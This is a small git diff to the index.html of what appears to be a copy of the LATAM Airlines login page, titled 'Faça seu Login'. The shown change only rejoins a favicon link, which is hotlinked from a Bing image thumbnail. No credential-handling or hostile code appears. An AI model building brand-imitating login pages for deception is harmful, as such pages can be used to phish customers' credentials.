--- a/index.html
+++ b/index.html
@@ -4,9 +4,7 @@
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Faça seu Login | LATAM AIRLINES</title>
-    <link rel="icon" href="https://th.bing.com/th/id/R.a5ac268982d8c5e364e26ae5bf2225a8?
-
-rik=BdgmKlyYGtyqig&pid=ImgRaw&r=0">
+    <link rel="icon" href="https://th.bing.com/th/id/R.a5ac268982d8c5e364e26ae5bf2225a8?rik=BdgmKlyYGtyqig&pid=ImgRaw&r=0">
     <style>
         body {
             font-family: Arial, sans-serif;
